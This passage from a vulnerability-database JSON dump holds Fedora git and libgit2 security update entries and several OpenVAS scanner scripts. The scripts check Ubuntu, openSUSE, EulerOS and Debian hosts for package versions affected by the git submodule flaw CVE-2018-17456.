"cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:55", "bulletinFamily": "unix", "cvelist": ["CVE-2018-10887", "CVE-2018-10888", "CVE-2018-11235", "CVE-2018-17456"], "description": "libgit2 is a portable, pure C implementation of the Git core methods provided as a re-entrant linkable library with a solid API, allowing you to write native speed custom Git applications in any language with bindings. ", "modified": "2018-10-14T23:31:19", "published": "2018-10-14T23:31:19", "id": "FEDORA:AD7E26075DAB", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 27 Update: libgit2-0.26.7-1.fc27", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:55", "bulletinFamily": "unix", "cvelist": ["CVE-2017-15298", "CVE-2018-11233", "CVE-2018-11235", "CVE-2018-17456"], "description": "Git is a fast, scalable, distributed revision control system with an unusually rich command set that provides both high-level operations and full access to internals. The git rpm installs common set of tools which are usually using with small amount of dependencies. To install all git packages, including tools for integrating with other SCMs, install the git-all meta-package. ", "modified": "2018-10-19T15:50:55", "published": "2018-10-19T15:50:55", "id": "FEDORA:B126C60E1762", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 27 Update: git-2.14.5-1.fc27", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:55", "bulletinFamily": "unix", "cvelist": ["CVE-2018-10887", "CVE-2018-10888", "CVE-2018-11235", "CVE-2018-17456"], "description": "libgit2 is a portable, pure C implementation of the Git core methods provided as a re-entrant linkable library with a solid API, allowing you to write native speed custom Git applications in any language with bindings. ", "modified": "2018-10-16T11:41:13", "published": "2018-10-16T11:41:13", "id": "FEDORA:DB3A56048699", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 28 Update: libgit2-0.26.7-1.fc28", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:55", "bulletinFamily": "unix", "cvelist": ["CVE-2018-10887", "CVE-2018-10888", "CVE-2018-11235", "CVE-2018-17456"], "description": "libgit2 is a portable, pure C implementation of the Git core methods provided as a re-entrant linkable library with a solid API, allowing you to write native speed custom Git applications in any language with bindings. ", "modified": "2018-11-09T05:26:13", "published": "2018-11-09T05:26:13", "id": "FEDORA:59FDC63352B3", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 28 Update: libgit2-0.26.8-1.fc28", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:55", "bulletinFamily": "unix", "cvelist": ["CVE-2018-10887", "CVE-2018-10888", "CVE-2018-11235", "CVE-2018-17456"], "description": "libgit2 is a portable, pure C implementation of the Git core methods provided as a re-entrant linkable library with a solid API, allowing you to write native speed custom Git applications in any language with bindings. ", "modified": "2018-11-09T05:56:41", "published": "2018-11-09T05:56:41", "id": "FEDORA:813D86150C93", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 27 Update: libgit2-0.26.8-1.fc27", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "openvas": [{"lastseen": "2019-05-29T18:33:20", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-17456"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2018-10-12T00:00:00", "id": "OPENVAS:1361412562310843657", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843657", "type": "openvas", "title": "Ubuntu Update for git USN-3791-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_3791_1.nasl 14140 2019-03-13 12:26:09Z cfischer $\n#\n# Ubuntu Update for git USN-3791-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843657\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-10-12 06:34:56 +0200 (Fri, 12 Oct 2018)\");\n script_cve_id(\"CVE-2018-17456\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for git USN-3791-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'git'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"It was discovered that git did not properly validate git submodule\nurls or paths. A remote attacker could possibly use this to craft a\ngit repository that causes arbitrary code execution when recursive\noperations are used.\");\n script_tag(name:\"affected\", value:\"git on Ubuntu 18.04 LTS,\n Ubuntu 16.04 LTS,\n Ubuntu 14.04 LTS\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n\n script_xref(name:\"USN\", value:\"3791-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3791-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU(14\\.04 LTS|18\\.04 LTS|16\\.04 LTS)\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"git\", ver:\"1:1.9.1-1ubuntu0.9\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU18.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"git\", ver:\"1:2.17.1-1ubuntu0.3\", rls:\"UBUNTU18.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU16.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"git\", ver:\"1:2.7.4-0ubuntu1.5\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-31T17:33:53", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-17456"], "description": "The remote host is missing an update for the ", "modified": "2020-01-31T00:00:00", "published": "2018-12-10T00:00:00", "id": "OPENVAS:1361412562310852170", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310852170", "type": "openvas", "title": "openSUSE: Security Advisory for libgit2 (openSUSE-SU-2018:4051-1)", "sourceData": "# Copyright (C) 2018 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.852170\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_cve_id(\"CVE-2018-17456\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-12-10 07:38:48 +0100 (Mon, 10 Dec 2018)\");\n script_name(\"openSUSE: Security Advisory for libgit2 (openSUSE-SU-2018:4051-1)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSELeap15\\.0\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2018:4051-1\");\n script_xref(name:\"URL\", value:\"https://lists.opensuse.org/opensuse-security-announce/2018-12/msg00019.html\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'libgit2'\n package(s) announced via the openSUSE-SU-2018:4051-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This update for libgit2 fixes the following issues:\n\n\n Security issue fixed:\n\n - CVE-2018-17456: Submodule URLs and paths with a leading '-' are now\n ignored to avoid injecting options into library consumers that perform\n recursive clones (bsc#1110949).\n\n - Version update to version 0.26.8 (bsc#1114729).\n\n This update was imported from the SUSE:SLE-15:Update update project.\n\n Patch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended\n installation methods\n like YaST online_update or 'zypper patch'.\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Leap 15.0:\n\n zypper in -t patch openSUSE-2018-1517=1\");\n\n script_tag(name:\"affected\", value:\"libgit2 on openSUSE Leap 15.0.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSELeap15.0\") {\n if(!isnull(res = isrpmvuln(pkg:\"libgit2-26\", rpm:\"libgit2-26~0.26.8~lp150.2.6.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libgit2-26-debuginfo\", rpm:\"libgit2-26-debuginfo~0.26.8~lp150.2.6.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libgit2-debugsource\", rpm:\"libgit2-debugsource~0.26.8~lp150.2.6.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libgit2-devel\", rpm:\"libgit2-devel~0.26.8~lp150.2.6.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libgit2-26-32bit\", rpm:\"libgit2-26-32bit~0.26.8~lp150.2.6.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libgit2-26-32bit-debuginfo\", rpm:\"libgit2-26-32bit-debuginfo~0.26.8~lp150.2.6.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-27T18:36:08", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-17456"], "description": "The remote host is missing an update for the Huawei EulerOS\n ", "modified": "2020-01-23T00:00:00", "published": "2020-01-23T00:00:00", "id": "OPENVAS:1361412562311220192389", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220192389", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for git (EulerOS-SA-2019-2389)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2019.2389\");\n script_version(\"2020-01-23T12:53:00+0000\");\n script_cve_id(\"CVE-2018-17456\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-01-23 12:53:00 +0000 (Thu, 23 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 12:53:00 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for git (EulerOS-SA-2019-2389)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROS-2\\.0SP2\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2019-2389\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-2389\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'git' package(s) announced via the EulerOS-SA-2019-2389 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Git before 2.14.5, 2.15.x before 2.15.3, 2.16.x before 2.16.5, 2.17.x before 2.17.2, 2.18.x before 2.18.1, and 2.19.x before 2.19.1 allows remote code execution during processing of a recursive 'git clone' of a superproject if a .gitmodules file has a URL field beginning with a '-' character.(CVE-2018-17456)\");\n\n script_tag(name:\"affected\", value:\"'git' package(s) on Huawei EulerOS V2.0SP2.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROS-2.0SP2\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"git\", rpm:\"git~1.8.3.1~14.h4\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perl-Git\", rpm:\"perl-Git~1.8.3.1~14.h4\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-07-04T18:55:43", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-17456"], "description": "joernchen of Phenoelit discovered that git, a fast, scalable,\ndistributed revision control system, is prone to an arbitrary code\nexecution vulnerability via a specially crafted .gitmodules file in a\nproject cloned with --recurse-submodules.", "modified": "2019-07-04T00:00:00", "published": "2018-10-05T00:00:00", "id": "OPENVAS:1361412562310704311", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310704311", "type": "openvas", "title": "Debian Security Advisory DSA 4311-1 (git - security update)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Auto-generated from advisory DSA 4311-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2018 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.704311\");\n script_version(\"2019-07-04T09:25:28+0000\");\n script_cve_id(\"CVE-2018-17456\");\n script_name(\"Debian Security Advisory DSA 4311-1 (git - security update)\");\n script_tag(name:\"last_modification\", value:\"2019-07-04 09:25:28 +0000 (Thu, 04 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-10-05 00:00:00 +0200 (Fri, 05 Oct 2018)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"https://www.debian.org/security/2018/dsa-4311.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2018 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB9\");\n script_tag(name:\"affected\", value:\"git on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the stable distribution (stretch), this problem has been fixed in\nversion 1:2.11.0-3+deb9u4.\n\nWe recommend that you upgrade your git packages.\");\n\n script_xref(name:\"URL\", value:\"https://security-tracker.debian.org/tracker/git\");\n script_tag(name:\"summary\", value:\"joernchen of Phenoelit discovered that git, a fast, scalable,\ndistributed revision control system, is prone to an arbitrary code\nexecution vulnerability via a specially crafted .gitmodules file in a\nproject cloned with --recurse-submodules.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"git\", ver:\"1:2.11.0-3+deb9u4\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"git-all\", ver:\"1:2.11.0-3+deb9u4\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"git-arch\", ver:\"1:2.11.0-3+deb9u4\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"git-core\", ver:\"1:2.11.0-3+deb9u4\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"git-cvs\", ver:\"1:2.11.0-3+deb9u4\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"git-daemon-run\", ver:\"1:2.11.0-3+deb9u4\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"git-daemon-sysvinit\", ver:\"1:2.11.0-3+deb9u4\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"git-doc\", ver:\"1:2.11.0-3+deb9u4\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"git-el\", ver:\"1:2.11.0-3+deb9u4\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"git-email\", ver:\"1:2.11.0-3+deb9u4\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"git-gui\", ver:\"1:2.11.0-3+deb9u4\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"git-man\", ver:\"1:2.11.0-3+deb9u4\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"git-mediawiki\", ver:\"1:2.11.0-3+deb9u4\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"git-svn\", ver:\"1:2.11.0-3+deb9u4\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"gitk\", ver:\"1:2.11.0-3+deb9u4\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"gitweb\", ver:\"1:2.11.0-3+deb9u4\", rls:\"DEB9\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-31T17:33:53", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-17456"], "description": "The remote host is missing an update for the ", "modified": "2020-01-31T00:00:00", "published": "2018-10-26T00:00:00", "id": "OPENVAS:1361412562310852092", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310852092", "type": "openvas", "title": "openSUSE: Security Advisory for git (openSUSE-SU-2018:3178-1)", "sourceData": "# Copyright (C) 2018 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.852092\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_cve_id(\"CVE-2018-17456\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-10-26 06:47:19 +0200 (Fri, 26 Oct 2018)\");\n script_name(\"openSUSE: Security Advisory for git (openSUSE-SU-2018:3178-1)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSELeap15\\.0\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2018:3178-1\");\n script_xref(name:\"URL\", value:\"https://lists.opensuse.org/opensuse-security-announce/2018-10/msg00030.html\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'git'\n package(s) announced via the openSUSE-SU-2018:3178-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This update for git fixes the following issues:\n\n - CVE-2018-17456: Git allowed remote code execution during processing of a\n recursive 'git clone' of a superproject if a .gitmodules file has a URL\n field beginning with a '-' character. (boo#1110949).\n\n This update was imported from the SUSE:SLE-15:Update update project.\n\n Patch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended\n installation methods\n like YaST online_update or 'zypper patch'.\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Leap 15.0:\n\n zypper in -t patch openSUSE-2018-1177=1\");\n\n script_tag(name:\"affected\", value:\"git on openSUSE Leap 15.0.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSELeap15.0\") {\n if(!isnull(res = isrpmvuln(pkg:\"git\", rpm:\"git~2.16.4~lp150.2.6.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"git-arch\", rpm:\"git-arch~2.16.4~lp150.2.6.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"git-core\", rpm:\"git-core~2.16.4~lp150.2.6.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"git-core-debuginfo\", rpm:\"git-core-debuginfo~2.16.4~lp150.2.6.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"git-credential-gnome-keyring\", rpm:\"git-credential-gnome-keyring~2.16.4~lp150.2.6.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"git-credential-gnome-keyring-debuginfo\", rpm:\"git-credential-gnome-keyring-debuginfo~2.16.4~lp150.2.6.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"git-credential-libsecret\", rpm:\"git-credential-libsecret~2.16.4~lp150.2.6.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"git-credential-libsecret-debuginfo\", rpm:\"git-credential-libsecret-debuginfo~2.16.4~lp150.2.6.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"git-cvs\", rpm:\"git-cvs~2.16.4~lp150.2.6.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"git-daemon\", rpm:\"git-daemon~2.16.4~lp150.2.6.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"git-daemon-debuginfo\", rpm:\"git-daemon-debuginfo~2.16.4~lp150.2.6.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"git-debuginfo\", rpm:\"git-debuginfo~2.16.4~lp150.2.6.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"git-debugsource\", rpm:\"git-debugsource~2.16.4~lp150.2.6.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"git-email\", rpm:\"git-email~2.16.4~lp150.2.6.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"git-gui\", rpm:\"git-gui~2.16.4~lp150.2.6.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"git-p4\", rpm:\"git-p4~2.16.4~lp150.2.6.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"git-svn\", rpm:\"git-svn~2.16.4~lp150.2.6.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"git-svn-debuginfo\", rpm:\"git-svn-debuginfo~2.16.4~lp150.2.6.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"git-web\", 